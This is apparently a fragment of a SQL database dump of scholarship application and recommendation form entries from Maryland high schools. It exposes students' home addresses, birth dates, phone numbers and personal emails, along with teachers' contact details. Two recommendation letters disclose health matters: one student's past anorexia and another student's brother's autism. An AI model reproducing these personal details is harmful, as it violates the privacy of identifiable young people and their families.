Mbullu'),(1082,145,8,4,'8 months'),(1083,145,8,5,'Advisor/Counselor'),(1084,145,8,7,'Excellent'),(1085,145,8,9,'Excellent'),(1086,145,8,8,'Excellent'),(1087,145,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2018/02/Recommendation_Marie-Mbullu.pdf'),(1088,145,8,16,'Highly recommended'),(1089,146,8,1.3,'Jae Hi'),(1090,146,8,1.6,'Hebler'),(1091,146,8,11,'Centennial High School'),(1092,146,8,12,'School Counselor'),(1093,146,8,2,'jaehi_hebler@hcpss.org'),(1094,146,8,3,'Lisa Germain Kerr'),(1095,146,8,4,'2 years'),(1096,146,8,5,'Advisor/Counselor'),(1097,146,8,7,'Excellent'),(1098,146,8,9,'N/A'),(1099,146,8,8,'Excellent'),(1100,146,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2018/02/Kerr-Lisa-scholarship.docx'),(1101,146,8,16,'Highly recommended'),(1102,147,8,1.3,'Jeremy'),(1103,147,8,1.6,'Whitaker'),(1104,147,8,11,'Centennial High School'),(1105,147,8,12,'Social Studies Teacher'),(1106,147,8,2,'Jeremy_Whitaker@hcpss.org'),(1107,147,8,3,'Chelsea Ofori'),(1108,147,8,4,'I have known Chelsea for almost six months.'),(1109,147,8,5,'Teacher/Professor'),(1110,147,8,7,'Excellent'),(1111,147,8,9,'Excellent'),(1112,147,8,8,'Excellent'),(1113,147,8,14,'Please see attached letter on Chelsea\'s behalf.'),(1114,147,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2018/03/chelseaoforirec.doc'),(1115,147,8,16,'Highly recommended'),(1116,148,8,1.3,'LaTia'),(1117,148,8,1.6,'Douglas'),(1118,148,8,11,'Oakland Mills High School'),(1119,148,8,12,'School Counselor'),(1120,148,8,2,'latia_douglas@hcpss.org'),(1121,148,8,3,'Samuel Onumah'),(1122,148,8,4,'This is my third year as his school counselor'),(1123,148,8,5,'Advisor/Counselor'),(1124,148,8,7,'Excellent'),(1125,148,8,9,'Excellent'),(1126,148,8,8,'Excellent'),(1127,148,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2018/03/Onumah-S-Scholarship.docx'),(1128,148,8,16,'Highly recommended'),(1129,149,8,1.3,'Michelle'),(1130,149,8,1.6,'Flynn'),(1131,149,8,11,'Centennial High School'),(1132,149,8,12,'Math Teacher'),(1133,149,8,2,'michelle_flynn@hcpss.org'),(1134,149,8,3,'Chelsea Ofori'),(1135,149,8,4,'1.5 years'),(1136,149,8,5,'Teacher/Professor'),(1137,149,8,7,'Excellent'),(1138,149,8,9,'Excellent'),(1139,149,8,8,'Excellent'),(1140,149,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2018/03/Ofori-Scholarship-Rec.docx'),(1141,149,8,16,'Highly recommended'),(1142,150,8,1.3,'LaTia'),(1143,150,8,1.6,'Douglas'),(1144,150,8,11,'Oakland Mills High School'),(1145,150,8,12,'School Counselor'),(1146,150,8,2,'latia_douglas@hcpss.org'),(1147,150,8,3,'Samuel Onumah'),(1148,150,8,4,'This is my third year as his school counselor'),(1149,150,8,5,'Advisor/Counselor'),(1150,150,8,7,'Excellent'),(1151,150,8,9,'Excellent'),(1152,150,8,8,'Excellent'),(1153,150,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2018/03/Onumah-S-Scholarship1.docx'),(1154,150,8,16,'Highly recommended'),(1155,151,8,1.3,'Natalia'),(1156,151,8,1.6,'Hart'),(1157,151,8,11,'Oakland Mills High School'),(1158,151,8,12,'School Counselor'),(1159,151,8,2,'natalia_hart@hcpss.org'),(1160,151,8,3,'Madelyn Harris'),(1161,151,8,4,'4 years as her school counselor'),(1162,151,8,5,'Advisor/Counselor'),(1163,151,8,7,'Excellent'),(1164,151,8,9,'Excellent'),(1165,151,8,8,'Excellent'),(1166,151,8,14,'Madelyn Harris is worth getting to know.  She is an amazing student, talented at her art form, and an extraordinary young leader.  I have had the opportunity to get to know her the past four years as her school counselor and I am amazed by her!  You would be remiss not to accept her as a recipient of this scholarship.\r\n	Let me start by pointing out the obvious. Her grades are stellar.  She has taken challenging coursework at advanced levels and obtains “A” grades with ease.  She is incredibly intelligent and can handle the complexity and demands of rigorous classes.  I know that she will not only find her place in the college classroom with ease, but she will offer her ideas, her knowledge and her perspective to her peers in discussions.  What is most amazing to me however is how she is able to do so well in her classes all the while committing to so many extra-curricular activities.  In fact, this is one of the things that her parents are most proud about; the fact that she can juggle her hectic schedule, still perform excellently academically and not drop a single ball!  \r\n	One of the activities that she has invested a lot of energy, effort, and time into is the Maryland Youth Ballet.  For two years in this internship, she has taken on many responsibilities while achieving excellent performance as demonstrated by her participation in professional level shows such as the Nutcracker.  Every day Madelyn devotes her time after-school perfecting her art form, as well as assistant teaching.  She even spends her Saturdays contributing to the Music and Motion program for disabled children.  In this program, she serves as a one on one mentor helping children learn dance skills and have fun in the process.  There is no doubt that this experience has shaped her view of the world by giving her the opportunity to interact with all types of people, even those typically not seen as capable of dancing!  \r\n	Another fantastic endeavor that Madelyn took upon herself to help bring to our school is a food pantry!  As her independent research project, her junior year, Madelyn worked with two of our teachers to make this resource a reality.  It took many meetings, many change of plans, special permission by the principal, as well as coming up with how people would access the pantry, in addition to how we would take donations.  Yet Madelyn stood by the project and saw it through!  It was exciting as a counselor, to see that our school had a pantry for our needy students and families in our community and that my student, Madelyn Harris, had such a huge role in the process!  In addition to this endeavor, Madelyn has held many different leadership positions while in school.  This year she serves as Secretary of the class of 2018 and Concert Master for String Orchestra.  She was also part of the graduating class of Leadership U in 2016 and was a delegate at Maryland Leadership workshops from 2014 to 2016. \r\n	Ironically however, as often plagues other dancers, Madelyn suffered from Anorexia.  In fact, she suffered through it her freshman and sophomore year, with sophomore year reaching its peak.  It got to the point where she would have to sit with the nurse or other trusted adult to eat her lunch.  This was a very sad and hard time for Madelyn and her family.  Yet, she came out of this experience, strong and victorious, but most importantly, healthy.  From speaking to her about this experience,  it is obvious that she is more the wiser, knows how to access her support system, and has grown more empathetic to others who have experienced anorexia or other debilitating disorders.  \r\n	Overall, Madelyn is a well-rounded, level-headed, intelligent, and driven student.  While some are simply focused on the dance aesthetic, Madelyn while passionate about dance has many skills that she could fall back on.  She has so much to offer a college, more than I can list in this letter, and I only see success in her future. Her leadership experiences abound and her perseverance and ability will take her wherever she wants to go!  For these reasons and more, I enthusiastically recommend her to receive this scholarship.  Thank you for considering her as a candidate!'),(1167,151,8,16,'Highly recommended'),(1168,152,8,1.3,'Will'),(1169,152,8,1.6,'Henderson'),(1170,152,8,11,'Paul Public Charter School'),(1171,152,8,12,'Director of Operations'),(1172,152,8,2,'will.hend@gmail.com'),(1173,152,8,3,'Seth Ragin'),(1174,152,8,4,'5 years'),(1175,152,8,5,'Advisor/Counselor'),(1176,152,8,7,'Excellent'),(1177,152,8,9,'Excellent'),(1178,152,8,8,'Excellent'),(1179,152,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2018/03/Seth-Ragin-W-Ruth-Conway.pdf'),(1180,152,8,16,'Highly recommended'),(1181,153,8,1.3,'LaTia'),(1182,153,8,1.6,'Douglas'),(1183,153,8,11,'Oakland Mills High School'),(1184,153,8,12,'School Counselor'),(1185,153,8,2,'latia_douglas@hcpss.org'),(1186,153,8,3,'Kyton Ovide'),(1187,153,8,4,'This is my third year as his school counselor'),(1188,153,8,5,'Advisor/Counselor'),(1189,153,8,7,'Excellent'),(1190,153,8,9,'Excellent'),(1191,153,8,8,'Excellent'),(1192,153,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2018/03/Ovide_-K-scholarship.docx'),(1193,153,8,16,'Highly recommended'),(1194,154,8,1.3,'David'),(1195,154,8,1.6,'Glenn'),(1196,154,8,11,'Howard HS'),(1197,154,8,12,'Student Services Team Leader'),(1198,154,8,2,'dglenn@hcpss.org'),(1199,154,8,3,'Mary Asubonten'),(1200,154,8,4,'3 years'),(1201,154,8,5,'Advisor/Counselor'),(1202,154,8,6,'Track Coach'),(1203,154,8,7,'Excellent'),(1204,154,8,9,'Average'),(1205,154,8,8,'Average'),(1206,154,8,14,'Mary is a talented, out-going young lady who is really coming of age.  She has really come a long way, taking more challenging courses and doing more in the community.  I believe she will make a fine candidate for your award.'),(1207,154,8,16,'Highly recommended'),(1216,155,6,21,'crystal.whitaker@outlook.com'),(1217,155,6,20,'(919) 723-7517'),(1218,155,6,10,'Atholton High School'),(1219,155,6,27,'BSAP Advisor'),(1220,155,6,28,'NA'),(1221,155,6,9,'3.0'),(1223,155,6,26,'NA'),(1224,155,6,12,'NA'),(1225,155,6,14,'NA'),(1226,155,6,13,'NA'),(1227,155,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/SCH-Advisor-Handbook.pdf'),(1228,156,6,18.3,'n a'),(1229,156,6,18.6,'na'),(1230,156,6,19.1,'na'),(1231,156,6,19.2,'na'),(1232,156,6,19.3,'na'),(1233,156,6,19.4,'na'),(1234,156,6,19.5,'na'),(1235,156,6,19.6,'United States'),(1236,156,6,4,'11-10-1984'),(1237,156,6,21,'crystal.whitaker@outlook.com'),(1238,156,6,20,'(919) 723-7518'),(1239,156,6,10,'Atholton High School'),(1240,156,6,27,'BSAP Advisor'),(1241,156,6,28,'na'),(1242,156,6,9,'na'),(1244,156,6,26,'na'),(1245,156,6,12,'na'),(1246,156,6,14,'na'),(1247,156,6,13,'na'),(1248,156,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/SCH-Advisor-Handbook1.pdf'),(1249,157,6,18.3,'n a'),(1250,157,6,18.6,'na'),(1251,157,6,19.1,'na'),(1252,157,6,19.2,'na'),(1253,157,6,19.3,'na'),(1254,157,6,19.4,'na'),(1255,157,6,19.5,'na'),(1256,157,6,19.6,'United States'),(1257,157,6,4,'11-10-1984'),(1258,157,6,21,'crystal.whitaker@outlook.com'),(1259,157,6,20,'(919) 723-7518'),(1260,157,6,10,'Atholton High School'),(1261,157,6,27,'BSAP Advisor'),(1262,157,6,28,'na'),(1263,157,6,9,'na'),(1265,157,6,26,'na'),(1266,157,6,12,'na'),(1267,157,6,14,'na'),(1268,157,6,13,'na'),(1269,157,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/SCH-Advisor-Handbook2.pdf'),(1270,158,8,1.3,'Melody'),(1271,158,8,1.6,'Green-Lewis'),(1272,158,8,11,'Howard High School'),(1273,158,8,12,'School Counselor'),(1274,158,8,2,'melody_green-lewis@hcpss.org'),(1275,158,8,3,'Nathaniel Gilmore'),(1276,158,8,4,'1 year'),(1277,158,8,5,'Advisor/Counselor'),(1278,158,8,7,'Excellent'),(1279,158,8,9,'Excellent'),(1280,158,8,8,'Excellent'),(1281,158,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2018/03/written-evaluation-Gilmore-Nathaniel.pdf'),(1282,158,8,16,'Highly recommended'),(1283,159,8,1.3,'Danny'),(1284,159,8,1.6,'Ives'),(1285,159,8,11,'River Hill High School'),(1286,159,8,12,'School Counselor'),(1287,159,8,2,'dives@hcpss.org'),(1288,159,8,3,'Laurence Crandon'),(1289,159,8,4,'4 years'),(1290,159,8,5,'Advisor/Counselor'),(1291,159,8,7,'Excellent'),(1292,159,8,9,'Excellent'),(1293,159,8,8,'Excellent'),(1294,159,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2018/03/laurence_crandon_rec_rhhs.pdf'),(1295,159,8,16,'Highly recommended'),(1296,160,8,1.3,'Maddy'),(1297,160,8,1.6,'Halbach'),(1298,160,8,11,'Applied Research Laboratory'),(1299,160,8,12,'Academy of Finance Facilitator'),(1300,160,8,2,'maddy_halbach@hcpss.org'),(1301,160,8,3,'Laurence Crandon'),(1302,160,8,4,'I\'ve known Laurence since his junior year in high school.'),(1303,160,8,5,'Teacher/Professor'),(1304,160,8,7,'Excellent'),(1305,160,8,9,'Excellent'),(1306,160,8,8,'Excellent'),(1307,160,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2018/03/Laurence-Crandon-scholarship-recommendation-technology.pdf'),(1308,160,8,16,'Highly recommended'),(1309,161,6,18.3,'Kyton'),(1310,161,6,18.6,'Ovide'),(1311,161,6,19.1,'9317 Angelina Circle'),(1312,161,6,19.3,'Columbia'),(1313,161,6,19.4,'MD'),(1314,161,6,19.5,'21045'),(1315,161,6,19.6,'United States'),(1316,161,6,4,'03/14/2000'),(1317,161,6,21,'kovide@aol.com'),(1318,161,6,20,'(443) 492-8635'),(1319,161,6,10,'Oakland Mills High School'),(1320,161,6,27,'Friend/Family Member'),(1321,161,6,28,'N/A'),(1322,161,6,9,'3.0 (quarter 1 and 2 in grade 12)'),(1324,161,6,26,'Anticipated major: mechanical engineering'),(1325,161,6,12,'N/A'),(1326,161,6,14,'Boy Scouts of America: membership-7 years; positions held-bugler, scout guide, assistant patrol leader, patrol leader.\r\nCross-Country, Indoor and Outdoor Track Teams: membership-4 years; position held-Co-Captain Indoor Track.\r\nHoward County DrugFree: membership-4 years; position held-Teen Advisory Council\r\nKappa League: membership-1 year.\r\nAlpha Achievers at Oakland Mills High School: membership-2 years; position held-Assistant Secretary/Historian.'),(1327,161,6,13,'Gold Honor Roll Award: 2015-2016\r\nScholar Athlete Award: 2015-2016\r\nScholar Athlete Award: 2016-2017\r\nBoy Scout Eagle Rank Award: currently I am an Eagle candidate, expected Eagle award 03/2018'),(1328,161,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/Kyton-Ovide-Essay.pdf'),(1329,161,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/Kyton-Ovide-Transcript.pdf'),(1330,161,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/Kyton-Ovide-Release-Form.pdf'),(1331,162,6,18.3,'Jalen'),(1332,162,6,18.6,'Philogene'),(1333,162,6,19.1,'9301 Steeple Court'),(1334,162,6,19.3,'Laurel'),(1335,162,6,19.4,'MD'),(1336,162,6,19.5,'20723'),(1337,162,6,19.6,'United States'),(1338,162,6,4,'01/16/2000'),(1339,162,6,21,'jalenphilogene@gmail.com'),(1340,162,6,20,'(301) 538-8846'),(1341,162,6,10,'Hammond High School'),(1342,162,6,27,'Social Media'),(1343,162,6,28,'Please note that I attend High Road Academy in Laurel, MD (Howard County). I selected Hammond High School from the dropdown since it is my zoned /home school.'),(1344,162,6,9,'3.10'),(1346,162,6,26,'Criminal Justice'),(1347,162,6,12,'NA'),(1348,162,6,14,'Phi Beta Sigma / Alpha Sigma, Sigma Beta Club (Member): Jan 2014 - Jul 2016 (2 yrs)\r\nMontgomery County Police Explorers Post 1986, Gaithersburg, MD (Member): Mar 2016 - Jan 2018 (2 yrs)\r\nReid Temple North Usher, Silver Spring, MD: Feb 2016 - Present (2 yrs)\r\nUniversity of Maryland Teen PEERS Program, College Park, MD: Jan 2018 - Present'),(1349,162,6,13,'Recognition for Consistency in Hard Work, High Road Academy  January 2016\r\nHonor Roll, High Road Academy,  5 Quarters'),(1350,162,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/JPhilogene_WRConway.docx'),(1351,162,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/JPhilogene_Transcript.pdf'),(1352,162,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/JPhilogene_photorelease.pdf'),(1353,163,8,1.3,'Denise'),(1354,163,8,1.6,'Mitchell'),(1355,163,8,11,'High Road Academy'),(1356,163,8,12,'School Counselor'),(1357,163,8,2,'denise.mitchell@catapultlearning.com'),(1358,163,8,3,'Jalen Philogene'),(1359,163,8,4,'4 years'),(1360,163,8,5,'Advisor/Counselor'),(1361,163,8,7,'Excellent'),(1362,163,8,9,'Excellent'),(1363,163,8,8,'Excellent'),(1364,163,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2018/03/JPhilogene_Recommendation_2.pdf'),(1365,163,8,16,'Highly recommended'),(1366,164,6,18.3,'Laurence'),(1367,164,6,18.6,'Crandon'),(1368,164,6,19.1,'12827 Macbeth Farm Lane'),(1369,164,6,19.3,'Clarksville'),(1370,164,6,19.4,'MD'),(1371,164,6,19.5,'21029'),(1372,164,6,19.6,'United States'),(1373,164,6,4,'05-05-00'),(1374,164,6,21,'ltcrandon@yahoo.com'),(1375,164,6,20,'(240) 676-6859'),(1376,164,6,10,'River Hill High School'),(1377,164,6,27,'Friend/Family Member'),(1378,164,6,28,'NA'),(1379,164,6,9,'3.67'),(1381,164,6,26,'Business/Finance'),(1382,164,6,12,'NA'),(1383,164,6,14,'Alpha Achievers, President (1 year); Vice President (1 year); Member (4 years)\r\nAcademy of Finance Executive Board (2 years)\r\nApplications Research Lab Ambassador (1 year)\r\nHoward County Teachers Federal Credit Union, Board Member (1 year)\r\nNational Honor Society (2 years)\r\nNational English Honor Society (2 years)\r\nFuture Business Leaders of America, Executive Board (2 years)'),(1384,164,6,13,'AP Scholar (2017)\r\nScholar Athlete (2015-2018) Football, Lacrosse, Track\r\nUS Fencing 1st Team All Academic (2016-2017)\r\nPrincipal\'s Honor Roll, 2015-2016 and 2017-2018\r\nCertificate of Appreciation, Howard County MLK Holiday Commission (2017)'),(1385,164,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/LTC-Transcript-through-Q22018.pdf'),(1386,164,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/Scan03112018170307.pdf'),(1387,164,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/WRC-Scholarship-application_Laurence.pdf'),(1388,165,6,18.3,'Marie'),(1389,165,6,18.6,'Mbullu'),(1390,165,6,19.1,'6078 Rockglen Drive'),(1391,165,6,19.3,'Elkridge'),(1392,165,6,19.4,'Maryland'),(1393,165,6,19.5,'21075'),(1394,165,6,19.6,'United States'),(1395,165,6,4,'07-28-2000'),(1396,165,6,21,'mbullumarie@gmail.com'),(1397,165,6,20,'(410) 705-5213'),(1398,165,6,10,'Howard High School'),(1399,165,6,27,'BSAP Advisor'),(1400,165,6,28,'N/A'),(1401,165,6,9,'3.52'),(1403,165,6,26,'Engineering'),(1404,165,6,12,'N/A'),(1405,165,6,14,'Black Student Union -President -9/1/2016-present, \r\n             Student Government- Freshman Class president 2014-2015\r\n             Feminist Association- public relations Officer   2016- present\r\n            Special Needs Faith Formation- Youth leader-   2013-present'),(1406,165,6,13,'I  have received best overall project for my app MAX ONLINE LABS at WiSci 2017 in Malawi, I have received gold at the Howard County Act-SO competition in contemporary dance, I have also won 4th place at Howard County Track and field championships for triple jump.'),(1407,165,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/ZETA-PHI-BETA.pdf'),(1408,165,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/new-doc-2017-12-15-16.35.38-20180314130326.pdf'),(1409,165,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/new-doc-2017-12-15-16.35.38_3.pdf'),(1410,166,8,1.3,'Jennifer'),(1411,166,8,1.6,'Walker'),(1412,166,8,11,'HCPSS/Biotechnology Career Academy'),(1413,166,8,12,'Teacher'),(1414,166,8,2,'jwalker@hcpss.org'),(1415,166,8,3,'Marie Mbullu'),(1416,166,8,4,'2 School Years'),(1417,166,8,5,'Teacher/Professor'),(1418,166,8,7,'Excellent'),(1419,166,8,9,'Excellent'),(1420,166,8,8,'Excellent'),(1421,166,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2018/03/Marie-Mbullu-Rec-Letter.docx'),(1422,166,8,16,'Highly recommended'),(1423,167,8,1.3,'Kaitlyn'),(1424,167,8,1.6,'Curtis'),(1425,167,8,11,'Wilde Lake High School'),(1426,167,8,12,'Teacher'),(1427,167,8,2,'kaitlyn_curtis@hcpss.org'),(1428,167,8,3,'Dashae\' Coley-Epps'),(1429,167,8,4,'4 years'),(1430,167,8,5,'Teacher/Professor'),(1431,167,8,7,'Excellent'),(1432,167,8,9,'Excellent'),(1433,167,8,8,'Excellent'),(1434,167,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2018/03/DColeyEpps-Recommedation.docx'),(1435,167,8,16,'Highly recommended'),(1436,168,8,1.3,'Cindy'),(1437,168,8,1.6,'Kelly'),(1438,168,8,11,'Applications and Research Laboratory'),(1439,168,8,12,'Teacher/ Biotechnology'),(1440,168,8,2,'cindy_kelly@hcpss.org'),(1441,168,8,3,'Nathaniel Gilmore'),(1442,168,8,4,'Two years in small classes with a great deal of class discussion, writing, and hands-on lab work.'),(1443,168,8,5,'Teacher/Professor'),(1444,168,8,7,'Average'),(1445,168,8,9,'Excellent'),(1446,168,8,8,'Excellent'),(1447,168,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2018/03/recommend-Nathaniel-Gilmore.pdf'),(1448,168,8,16,'Highly recommended'),(1449,169,6,18.3,'Lisa'),(1450,169,6,18.6,'Kerr'),(1451,169,6,19.1,'3101 Burgess Mill Way'),(1452,169,6,19.2,'H'),(1453,169,6,19.3,'Ellicott City'),(1454,169,6,19.4,'Maryland'),(1455,169,6,19.5,'21043'),(1456,169,6,19.6,'United States'),(1457,169,6,4,'06-08-00'),(1458,169,6,21,'lkerr07@hotmail.com'),(1459,169,6,20,'(443) 610-0703'),(1460,169,6,10,'Centennial High School'),(1461,169,6,27,'Friend/Family Member'),(1462,169,6,28,'N/A'),(1463,169,6,9,'3.86'),(1465,169,6,26,'International Business'),(1466,169,6,12,'NA'),(1467,169,6,14,'*Organization: Howard County Council; Position: Intern for Dr. Calvin Ball, the Vice Chairman; Duration; 3 months (Summer)\r\n*Club: Young Democrats; Position: Vice President; Duration: 1 year and 7 months\r\n*Organization: Duke of Edinburgh; Position: Member, Duration: 6 months (1 semester each year for 2 years)\r\n*Club: Ellicott City Tutors; Position: Member, Duration: 6 months (1 semester each year for 2 years)\r\n*Club: Activity Planning Board; Position: Member; Duration: 1 year'),(1468,169,6,13,'*2017 National Japanese Exam: 1st in Maryland and 74th Nationally on Level 3 (highest level)\r\n*2015 Semifinalist for WJZ-TV Black History Month Oratory Competition'),(1469,169,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/Ruth-Conway-Scholarship-Essay.docx'),(1470,169,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/Unofficial-HS-Transcript.pdf'),(1471,169,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/Photo-Release-Form.pdf'),(1472,170,8,1.3,'Rebecca'),(1473,170,8,1.6,'Bragunier'),(1474,170,8,11,'Howard High School'),(1475,170,8,12,'Teacher'),(1476,170,8,2,'rebecca_bragunier@hcpss.org'),(1477,170,8,3,'Mary Asubonten'),(1478,170,8,4,'1 year'),(1479,170,8,5,'Teacher/Professor'),(1480,170,8,7,'Excellent'),(1481,170,8,9,'Excellent'),(1482,170,8,8,'Excellent'),(1483,170,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2018/03/Mary.doc'),(1484,170,8,16,'Highly recommended'),(1485,171,8,1.3,'Bryan'),(1486,171,8,1.6,'Ringgold'),(1487,171,8,11,'Oakland Mills High School / Alpha Achievers'),(1488,171,8,12,'Black Student Achievement Liaison(BSAP) / Alpha Achievers Co-Advisor'),(1489,171,8,2,'Bryan_Ringgold@hcpss.org'),(1490,171,8,3,'Kyton Ovide'),(1491,171,8,4,'1 year'),(1492,171,8,5,'Advisor/Counselor'),(1493,171,8,7,'Excellent'),(1494,171,8,9,'Excellent'),(1495,171,8,8,'Excellent'),(1496,171,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2018/03/Kyton-LOR.docx'),(1497,171,8,16,'Highly recommended'),(1498,172,8,1.3,'Louis'),(1499,172,8,1.6,'Jones'),(1500,172,8,11,'Maryland Department of Transportation'),(1501,172,8,12,'Director of Diversity & Equity'),(1502,172,8,2,'lwj1111@aol.com'),(1503,172,8,3,'Jaidyn Sykes'),(1504,172,8,4,'17 years'),(1505,172,8,5,'Other'),(1506,172,8,6,'Family  Friend'),(1507,172,8,7,'Excellent'),(1508,172,8,9,'Excellent'),(1509,172,8,8,'Excellent'),(1510,172,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2018/03/Jadiyn-Letter-of-Recommedation.docx'),(1511,172,8,16,'Highly recommended'),(1512,173,8,1.3,'Christopher'),(1513,173,8,1.6,'Clark'),(1514,173,8,11,'Atholton High School'),(1515,173,8,12,'Science Teacher and Track Coach'),(1516,173,8,2,'Christopher_clark@hcpss.org'),(1517,173,8,3,'Asha Washington'),(1518,173,8,4,'4 years'),(1519,173,8,5,'Teacher/Professor'),(1520,173,8,7,'Excellent'),(1521,173,8,9,'Excellent'),(1522,173,8,8,'Excellent'),(1523,173,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2018/03/A-Washington-Recommendation.docx'),(1524,173,8,16,'Highly recommended'),(1525,174,8,1.3,'Phillip'),(1526,174,8,1.6,'Cohen'),(1527,174,8,11,'Atholton High School'),(1528,174,8,12,'School Counselor'),(1529,174,8,2,'phillip_cohen@hcpss.org'),(1530,174,8,3,'Kianna Ameni-Melvin'),(1531,174,8,4,'3 + years'),(1532,174,8,5,'Advisor/Counselor'),(1533,174,8,7,'Excellent'),(1534,174,8,9,'Excellent'),(1535,174,8,8,'Excellent'),(1536,174,8,16,'Highly recommended'),(1537,175,8,1.3,'Phil'),(1538,175,8,1.6,'Cohen'),(1539,175,8,11,'Atholton High School'),(1540,175,8,12,'School Counselor'),(1541,175,8,2,'phillip_cohen@hcpss.org'),(1542,175,8,3,'Kianna Ameni-Melvin'),(1543,175,8,4,'3 + years'),(1544,175,8,5,'Teacher/Professor'),(1545,175,8,7,'Excellent'),(1546,175,8,9,'Excellent'),(1547,175,8,8,'Excellent'),(1548,175,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2018/03/Ameni-Melvin-Kianna.docx'),(1549,175,8,16,'Highly recommended'),(1550,176,8,1.3,'Tina'),(1551,176,8,1.6,'Morrison'),(1552,176,8,11,'Ilchester Elementary School'),(1553,176,8,12,'School Counselor'),(1554,176,8,2,'Tina_Morrison@hcpss.org'),(1555,176,8,3,'Kianna Ameni-Melvin'),(1556,176,8,4,'18 years'),(1557,176,8,5,'Other'),(1558,176,8,6,'Community Member, family friend'),(1559,176,8,7,'Excellent'),(1560,176,8,9,'Excellent'),(1561,176,8,8,'Excellent'),(1562,176,8,14,'It is without reservation that I recommend Kianna Melvin as a candidate for the W. Ruth Conway Scholarship.  I have known Kianna Melvin for 17 years.  I attend Bridgeway Community Church in Columbia, Maryland, the same church as she and her family.  She always carries herself in a polite and respectable manner.  She is exceptionally gifted at making others feel comfortable and always maintain a positive attitude.\r\n\r\nKianna has greatly enriched her high school life by engaging in extracurricular activities all while maintaining her honor roll status throughout high school.  She recently invited me to attend a Black History Month performance at her school where the students provided and exemplar Black History program that was very informative as well as entertaining. She was commended for a job well done for her role in the success of the program, as she is an active member of the Black Student Union and the Student Government. \r\n\r\nIn addition, Kianna has a twin brother who has Autism. Not only does Kianna support her brother at home, but actively participates in all of his endeavors by becoming a peer volunteer for The Howard County Special Olympics throughout the year, as well as becoming a mentor for the Special Education Department at Atholton High School, where she and her brother attend.  \r\n\r\nI am convinced that Kianna Melvin would make a valuable contribution at any university she attends both inside and outside of the classroom.  She has my highest recommendation.  Should you have any questions, please do not hesitate to contact me.'),(1563,176,8,16,'Highly recommended'),(1564,177,6,18.3,'Malik'),(1565,177,6,18.6,'Bowman'),(1566,177,6,19.1,'8555 Falls Run Rd'),(1567,177,6,19.2,'Apt F'),(1568,177,6,19.3,'Ellicott City'),(1569,177,6,19.4,'MD'),(1570,177,6,19.5,'21043'),(1571,177,6,19.6,'United States'),(1572,177,6,4,'08/05/00'),(1573,177,6,21,'mbowma2101@gmail.com'),(1574,177,6,20,'(443) 979-0591'),(1575,177,6,10,'Long Reach High School'),(1576,177,6,27,'BSAP Advisor'),(1577,177,6,28,'NA'),(1578,177,6,9,'3.57'),(1580,177,6,26,'Mechanical 